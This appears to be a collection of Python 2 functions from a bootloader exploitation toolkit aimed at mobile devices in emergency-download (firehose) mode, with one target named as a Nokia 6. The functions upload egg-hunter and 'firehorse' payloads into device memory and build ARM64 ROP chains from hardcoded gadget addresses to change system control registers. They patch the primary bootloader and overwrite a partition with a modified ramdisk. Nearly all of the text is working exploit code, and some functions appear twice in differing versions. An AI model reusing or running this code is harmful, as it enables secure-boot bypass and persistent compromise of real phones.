def upload_fh():
target = t.get()
FH_FW.sendfile("../device/build/fh64.payload", target.fh_base_programmer)
# e = XMLHunter(file("../device/build/fh64.payload","rb").read(),
# target.fh_base_programmer, target)
# e.send()
return
def hook_handlers():
target = t.get()
I("Hooking handlers")
for i in xrange(16):
I("%d" % i)
FH_FW.sendfile("../device/build/dbgentry64.payload",
0xf803f000 + i * 0x80)
def do_send(self, dst, part):
magic_null = struct.pack("<L", XMLHunter.MAGIC_NULL)
magic_quote = struct.pack("<L", XMLHunter.MAGIC_QUOTE)
magic_oneah = struct.pack("<L", XMLHunter.MAGIC_ONEAH)
part = struct.pack("<L", dst)\
.replace("\x00", magic_null)\
.replace("\"", magic_quote)\
.replace("\x1a", magic_oneah) + part
FH_FW.poke_payload(self.target.exe_addr, self.target.arch / 8,
self.target.egghunter_base, part)
def magic():
target = t.get()
cmd = Commands()
bbdb = BasicBlocks(target.basicblocks_db_pbl)
bpm = BreakpointManager(bbdb)
pm = PatchManager()
I('applying patches and breakpoints...')
apply_patches(pm, target)
apply_breakpoints(bpm)
I('creating pagecopy...')
pages = set()
pages.update(pm.get_pbl_page_numbers())
pages.update(bpm.get_pbl_page_numbers())
I('pages: ' + str(pages))
pc = PageCopy(MODE_PBL,
target.pbl_base_addr,
target.pbl_copy_addr,
pages,
target_pages=[
0x807D000, 0x807E000, 0x807F000, 0x807C000, 0x8068000,
0x806e000, 0x807B000
])
I('uploading firehorse data...')
fh = Firehorse(pm, bpm, pc)
fhdata = fh.pack()
fhbin = file("../tmp/fh.bin", "wb")
fhbin.write(fhdata)
fhbin.close()
e = XMLHunter(fhdata, target.fh_base_programmer + target.fh_scratch_offset,
target)
e.send()
I('uploading firehorse..')
e = XMLHunter(
file("../device/build/fh.payload", "rb").read(),
target.fh_base_programmer, target)
e.send()
I('initializing firehorse...')
FH_FW.exe_cmd(target.fh_base_programmer, cmd.INIT)
I('calling pbl patcher...')
FH_FW.exe_cmd(target.fh_base_programmer, cmd.PBL_PATCHER)
def magic():
cmd = Commands()
target = t.get()
# overwrite logdump partition with our modified ramdisk
Framework.write_partition("logdump",
"target/nokia6/nokia6-ramdisk-modified.cpio.gz")
bbdb = BasicBlocks(target.basicblocks_db_pbl)
bpm = BreakpointManager(bbdb)
pm = PatchManager()
I("applying patches and breakpoints...")
apply_patches(pm, target)
apply_breakpoints(bpm)
I("creating pagecopy...")
pages = set()
pages.update(pm.get_pbl_page_numbers())
pages.update(bpm.get_pbl_page_numbers())
I("pages: " + str(pages))
pc = PageCopy(MODE_PBL, target.pbl_base_addr, target.pbl_copy_addr, pages)
I("uploading firehorse data...")
fh = Firehorse(pm, bpm, pc)
fhdata = fh.pack()
fhbin = file("../tmp/fh.bin", "wb")
fhbin.write(fhdata)
fhbin.close()
egg_hunter = Egg(fhdata,
target.fh_base_programmer + target.fh_scratch_offset)
egg_hunter.send()
I("uploading firehorse...")
egg_hunter = Egg(
file("../device/build/fh.payload", "rb").read(),
target.fh_base_programmer)
egg_hunter.send()
I("initializing firehorse...")
FH_FW.exe_cmd(target.fh_base_programmer, cmd.INIT)
I("calling pbl patcher...")
FH_FW.exe_cmd(target.fh_base_programmer, cmd.PBL_PATCHER)
if "wait" in " ".join(sys.argv):
I("waiting for LF")
raw_input()
I("you have 5 seconds")
time.sleep(5)
Framework.exe(target.pbl_base_addr)
def _send_parts(self, d):
FH_FW.poke32(self.target.egghunter_found_parts, 0)
file(Egg.EGG_FILE, "wb").write(self.pack(d))
xml = file(self.target.egg_xml, "rb").read()
FH_FW.firehose(xml)
FH_FW.exe_cmd(self.target.egghunter_base, 0)
found_parts = FH_FW.peek32(self.target.egghunter_found_parts)
d = FH_FW.peek32(self.target.egghunter_found_parts)
return d
def boom():
target = t.get()
FH_FW.peek(target.fh_base_programmer, 0x1100)
I('1')
FH_FW.peek(target.fh_base_programmer, 0x1100)
I('2')
FH_FW.peek(target.fh_base_programmer, 0x1100)
I('3')
FH_FW.peek(target.fh_base_programmer, 0x1100)
I('4')
#FH_FW.sendfile("../device/build/test64.payload", 0xf8048c00)
I('5')
#FH_FW.poke64(0xfec04098,0xf8048c00)
I('boom')
return
def upload_fh_data():
target = t.get()
bbdb = BasicBlocks(target.basicblocks_db_pbl)
bpm = BreakpointManager(bbdb)
#bpm.bp_programmer(0xF801DAFC, msg="peek0")
#bpm.bp_programmer(0xF801DA08, msg="poke")
pm = PatchManager()
# pm.patch32_programmer(0x1402C958, 0xFFFFFFFF)
I('applying patches and breakpoints...')
I('creating pagecopy...')
pages = set()
I('pages: ' + str(pages))
pc = PageCopy(MODE_PBL,
target.pbl_base_addr,
target.pbl_copy_addr,
pages,
target_pages=[
0x807D000, 0x807E000, 0x807F000, 0x807C000, 0x8068000,
0x806e000, 0x807B000
])
I('uploading firehorse data...')
fh = Firehorse(pm, bpm, pc)
fhdata = fh.pack()
fhbin = file("../tmp/fh.bin", "wb")
fhbin.write(fhdata)
fhbin.close()
FH_FW.sendfile("../tmp/fh.bin",
target.fh_base_programmer + target.fh_scratch_offset)
def voodoo():
target = t.get()
for i in xrange(8):
print '%d' % i
FH_FW.peek(target.fh_base_programmer, 0x4000)
def upload_init64():
target = t.get()
FH_FW.sendfile("../device/build/init64.payload", target.fh_base_programmer)
FH_FW.exe64(target.fh_base_programmer)
def rop():
target = t.get()
# copy original stack
FH_FW.copy(0xFEC040a0, 0xFEC03F90, 0x256)
FH_FW.copy(0xFEC04098, 0xFEC03F88, 8)
# gadget_set_sctlr_el3
FH_FW.poke64(0xFEC04060, 0xF803DF38)
# saved x1 = 0
FH_FW.poke64(0xFEC04f88, 0)
# gadget_blr_x4
FH_FW.poke64(0xFEC03f90, 0xf800e280)
# super gadget F803E848
FH_FW.poke64(target.saved_lr_addr, 0xF803E848)
def init_firehose():
target = t.get()
cmd = Commands()
I('initializing firehorse...')
FH_FW.exe64_cmd(target.fh_base_programmer, cmd.INIT)
def upload_xmlhunter(self):
I('uploading xmlhunter to %08x' % self.target.egghunter_base)
FH_FW.sendfile("../device/build/xmlhunt.payload",
self.target.egghunter_base)
XMLHunter.uploaded = True
def upload_egghunter(self):
I('uploading egghunter to %08x' % self.target.egghunter_base)
FH_FW.sendfile("../device/build/dload.payload",
self.target.egghunter_base)
Egg.uploaded = True
def rop():
target = t.get()
# super gadget
# FH_FW.poke64(target.saved_lr_addr+8, GADGET_INFINITE_LOOP)
"""
# copy original stack
FH_FW.copy(target.saved_lr_addr+0x128, target.saved_lr_addr+8, 0x128)
# copy original saved lr
FH_FW.poke64(target.saved_lr_addr+0x120, target.saved_lr)
# set new stack
FH_FW.poke64(target.saved_lr_addr+0x20, target.saved_lr_addr+0x118)
# set blr x8 gadget
FH_FW.poke64(target.saved_lr_addr+0x8, GADGET_RESET)
# set saved_x8
FH_FW.poke64(target.saved_lr_addr+0xb8, GADGET_RESET)
# set super gadget
FH_FW.poke64(target.saved_lr_addr, GADGET_SUPER)
"""
# FH_FW.poke64(target.saved_lr_addr+0xC0, 0)
# FH_FW.poke64(target.saved_lr_addr+0x30, GADGET_RESET)
# FH_FW.poke64(target.saved_lr_addr+0x28, GADGET_RESET)
# FH_FW.poke64(target.saved_lr_addr+0x20, GADGET_RESET)
# FH_FW.poke64(target.saved_lr_addr+0x18, GADGET_RESET)
# FH_FW.poke64(target.saved_lr_addr+0x10, GADGET_RESET)
# FH_FW.poke64(target.saved_lr_addr+0x8, GADGET_RESET)
FH_FW.poke64(target.saved_lr_addr + 0x1f0, 0x0) # x1
FH_FW.poke64(target.saved_lr_addr + 0x108, 0x98) # x28
FH_FW.poke64(target.saved_lr_addr + 0x128, 0x1) # x24
FH_FW.poke64(target.saved_lr_addr + 0x130, 0x1000) # X25
FH_FW.poke64(target.saved_lr_addr + 0x160,
target.saved_lr_addr + 0x218 + 0x28)
FH_FW.poke64(target.saved_lr_addr + 0x200,
target.saved_lr_addr + 0x218 + 0x28)
FH_FW.copy_and_rebase(target.saved_lr_addr + 0x218,
target.saved_lr_addr + 8, 0x210)
FH_FW.poke64(target.saved_lr_addr + 0x210, target.saved_lr)
FH_FW.poke64(target.saved_lr_addr + 0x110, target.saved_lr_addr + 0x208)
FH_FW.poke64(target.saved_lr_addr + 0x1a8, GADGET_SCTLR_EL1)
FH_FW.poke64(target.saved_lr_addr + 0xf8, GADGET_BLR_X8)
FH_FW.poke64(target.saved_lr_addr + 0xf0, GADGET_SUPER)
FH_FW.poke64(target.saved_lr_addr, GADGET_ADD_SP)